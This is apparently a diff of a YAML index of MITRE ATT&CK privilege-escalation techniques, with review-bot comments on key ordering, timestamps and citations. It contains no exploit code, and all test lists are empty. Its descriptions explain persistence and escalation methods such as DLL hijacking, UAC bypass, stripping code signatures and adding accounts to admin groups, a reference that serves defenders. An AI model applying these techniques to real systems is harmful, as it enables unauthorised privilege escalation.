- spec_version: '2.1'
atomic_tests: []
T1546.013:
technique:
@@ -15630,7 +15900,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.013
atomic_tests: []
T1543:
@@ -15715,7 +15984,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.006:
technique:
@@ -15747,7 +16015,7 @@ privilege-escalation:
Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:08:21.101Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: LC_LOAD_DYLIB Addition
x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -15770,11 +16038,10 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -15832,14 +16099,13 @@ privilege-escalation:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests: []
T1548.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:35:39.112Z'
name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
description: |-
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -15940,7 +16206,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.002
atomic_tests: []
T1548.003:
@@ -15971,7 +16236,7 @@ privilege-escalation:
description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
Does. Retrieved March 19, 2018.
source_name: cybereason osx proton
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-14T16:28:19.781Z'
name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
description: |-
Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -16005,13 +16270,11 @@ privilege-escalation:
- User
x_mitre_effective_permissions:
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1548.003
atomic_tests: []
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -16030,7 +16293,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -16044,7 +16306,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -16071,8 +16332,8 @@ privilege-escalation:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -16103,12 +16364,13 @@ privilege-escalation:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests: []
T1547:
technique:
- modified: '2024-04-16T12:26:07.945Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: Boot or Logon Autostart Execution
description: |-
Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
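Review bot: The `+ x_mitre_attack_spec_version: 3.2.0` and `+ x_mitre_modified_by_ref` lines here are the counterparts of the `- x_mitre_attack_spec_version: 2.1.0` and `- x_mitre_modified_by_ref` deletions earlier in the same T1574.011 object, so the net change is a spec bump from 2.1.0 to 3.2.0 plus a key reorder. Emitting keys in a stable order from the generator would keep these hunks down to the one-line value change they actually represent.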
@@ -16180,9 +16442,9 @@ privilege-escalation:
2017.
url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Microsoft TimeProvider
description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -16198,12 +16460,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547
atomic_tests: []
T1547.014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T14:17:17.353Z'
name: Active Setup
description: |-
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -16278,12 +16539,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.014
atomic_tests: []
T1484.002:
technique:
- modified: '2024-04-19T04:27:51.388Z'
+ modified: '2024-09-25T13:50:11.593Z'
name: Domain Trust Modification
description: "Adversaries may add new domain trusts, modify the properties of
existing domain trusts, or otherwise change the configuration of trust relationships
@@ -16303,9 +16563,14 @@ privilege-escalation:
trust modifications such as altering the claim issuance rules to log in any
valid set of credentials as a specified user.(Citation: AADInternals zure
AD Federated Domain) \n\nAn adversary may also add a new federated identity
- provider to an identity tenant such as Okta, which may enable the adversary
- to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
- 2023)"
+ provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+ may enable the adversary to authenticate as any user of the tenant.(Citation:
+ Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+ gain broad access into a variety of cloud-based services that leverage the
+ identity tenant. For example, in AWS environments, an adversary that creates
+ a new identity provider for an AWS Organization will be able to federate into
+ all of the AWS Organization member accounts without creating identities for
+ each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
@@ -16325,9 +16590,8 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '2.0'
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
@@ -16344,6 +16608,10 @@ privilege-escalation:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1484/002
external_id: T1484.002
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
- source_name: CISA SolarWinds Cloud Detection
description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
in Microsoft Cloud Environments. Retrieved January 8, 2021.
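Review bot: `source_name: AWS RE:Inforce Threat Detection 2024` is an unquoted plain scalar containing a colon; it parses as intended because the colon is not followed by whitespace, and the string matches the "(Citation: AWS RE:Inforce Threat Detection 2024)" tag added to the description hunk above exactly, so the new citation resolves. If the generator ever starts quoting values, keep this one unchanged rather than splitting on the colon.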
@@ -16377,7 +16645,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.002
atomic_tests: []
T1543.003:
@@ -16533,31 +16800,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.003
atomic_tests: []
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -16574,6 +16821,7 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -16584,9 +16832,13 @@ privilege-escalation:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -16594,13 +16846,29 @@ privilege-escalation:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests: []
T1098.003:
technique:
- modified: '2024-03-29T18:29:06.873Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Roles'
description: "An adversary may add additional roles or permissions to an adversary-controlled
cloud account to maintain persistent access to a tenant. For example, adversaries
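Review bot: Beyond the key reorder, this hunk introduces fields that T1053.003 did not have before: `revoked: false` and `x_mitre_remote_support: false` here, `x_mitre_deprecated: false` in the earlier hunk, plus `x_mitre_version` 1.1 -> 1.2 and `x_mitre_attack_spec_version` 2.1.0 -> 3.2.0. Those are the substantive changes and are easy to lose in the churn; any consumer that filters on `revoked` or `x_mitre_deprecated` should treat objects that lack the field (several in this diff still do) the same as an explicit `false`, otherwise this object will be selected differently from its neighbours. The `external_references` entry also swaps the order of `url` and `external_id`, which is harmless for YAML but will show up as noise in every future regeneration if the ordering is not stabilised.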
@@ -16630,6 +16898,7 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Alex Parsons, Crowdstrike
@@ -16640,6 +16909,7 @@ privilege-escalation:
- Praetorian
- Alex Soler, AttackIQ
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
accounts to identify unusual activity in the assignment of roles to those
@@ -16648,13 +16918,13 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
@@ -16696,9 +16966,6 @@ privilege-escalation:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.003
atomic_tests: []
T1547.012:
@@ -16766,19 +17033,18 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -16794,8 +17060,8 @@ privilege-escalation:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -16809,7 +17075,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -16835,6 +17101,10 @@ privilege-escalation:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
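Review bot: the new `Hexacorn DLL Hijacking` entry resolves the `(Citation: Hexacorn DLL Hijacking)` marker added to the T1574.001 description above, so the citation key and the reference list stay consistent. While this list is being touched, note the unchanged neighbour `Microsoft. (, May 23). Microsoft Security Advisory 2269637.` still has an empty year field; since the references are regenerated from upstream ATT&CK data this is an upstream fix rather than something to patch in this file, but it is worth reporting so the next regeneration picks it up.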
@@ -16862,12 +17132,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests: []
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -16893,7 +17162,7 @@ privilege-escalation:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -16935,7 +17204,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1098.006:
technique:
@@ -17013,11 +17281,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -17097,7 +17364,77 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
+ atomic_tests: []
+ T1098.007:
+ technique:
+ modified: '2024-10-14T14:32:08.926Z'
+ name: Additional Local or Domain Groups
+ description: "An adversary may add additional local or domain groups to an adversary-controlled
+ account to maintain persistent access to a system or domain.\n\nOn Windows,
+ accounts may use the `net localgroup` and `net group` commands to add existing
+ users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+ Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+ the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+ added to the local administrators group on Windows devices to maintain elevated
+ privileges. They may also be added to the Remote Desktop Users group, which
+ allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+ to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+ Linux, accounts may be added to the sudoers group, allowing them to persistently
+ leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+ for elevated privileges. \n\nIn Windows environments, machine accounts may
+ also be added to domain groups. This allows the local SYSTEM account to gain
+ privileges on the domain.(Citation: RootDSE AD Detection 2022)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'User Account: User Account Modification'
+ type: attack-pattern
+ id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+ created: '2024-08-05T20:49:49.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1098/007
+ external_id: T1098.007
+ - source_name: Linux Usermod
+ description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+ url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+ - source_name: Microsoft Net Group
+ description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+ 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+ - source_name: Microsoft Net Localgroup
+ description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+ 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+ - source_name: Microsoft RDP Logons
+ description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+ Services. Retrieved August 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+ - source_name: RootDSE AD Detection 2022
+ description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+ Active Directory environments. Retrieved August 5, 2024.
+ url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.003:
technique:
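Review bot: the new T1098.007 object ships with `x_mitre_detection: ''` even though its description names concrete, loggable actions (`net localgroup`, `net group`, `usermod`) and declares the data source `'User Account: User Account Modification'`; if the empty field mirrors the upstream STIX object that is acceptable, but combined with `atomic_tests: []` it means this index entry currently carries no detection text and no test, which should be stated in the PR description. Two smaller consistency points in the same hunk: `x_mitre_platforms` lists `macOS` while the description only discusses Windows and Linux group membership, and the contributor line `Madhukar Raina (Senior Security Researcher - Hack The Box, UK)` departs from the `Name, Organisation` form used elsewhere in this file (for example `Arun Seelagan, CISA`). The description scalar also carries a trailing space before `\n\nIn Windows environments`, which a double-quoted YAML string preserves.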
@@ -17120,7 +17457,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:22:50.800Z'
name: Thread Execution Hijacking
description: "Adversaries may inject malicious code into hijacked processes
in order to evade process-based defenses as well as possibly elevate privileges.
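Review bot: `modified` for T1055.003 moves backwards, from `2022-04-25T14:00:00.188Z` to `2021-10-18T12:22:50.800Z`, and the same regression appears below for T1546.011, T1037.002, T1055, T1547.005, T1543.004, T1546.005, T1574.006, T1134.002, T1548.001, T1546.012, T1055.013 and T1574.005. Every old value shares the `.188Z` suffix (mostly `14:00:00.188Z`), which looks like a bulk re-stamp from an earlier conversion rather than a real edit time, and the new values look like genuine upstream timestamps, so the change is probably right; it still needs a sentence in the PR description, because any consumer that uses `modified` to detect updates will read these as rollbacks.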
@@ -17168,8 +17505,6 @@ privilege-escalation:
- Anti-virus
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.003
atomic_tests: []
T1546.011:
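Review bot: removing both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` leaves T1055.003 with no attack spec version at all, while the objects around it keep `3.2.0` or `3.1.0`; the same happens below for T1546.011, T1547.005, T1546.005, T1546.012 and T1055.013, the same older objects whose `modified` dates regress to 2020 and 2021. That is consistent with these objects predating the `x_mitre_attack_spec_version` field upstream, but any code reading this index must now treat the key as optional, and the PR description should say so rather than leaving readers to infer it from the diff.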
@@ -17201,7 +17536,7 @@ privilege-escalation:
description: Pierce, Sean. (2015, November). Defending Against Malicious Application
Compatibility Shims. Retrieved June 22, 2017.
source_name: Black Hat 2015 App Shim
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.094Z'
name: 'Event Triggered Execution: Application Shimming'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by application shims. The Microsoft
@@ -17256,13 +17591,11 @@ privilege-escalation:
- 'Process: Process Creation'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.011
atomic_tests: []
T1547.010:
technique:
- modified: '2024-04-12T02:49:39.980Z'
+ modified: '2024-09-12T15:26:17.886Z'
name: 'Boot or Logon Autostart Execution: Port Monitors'
description: "Adversaries may use port monitors to run an adversary supplied
DLL during system boot for persistence or privilege escalation. A port monitor
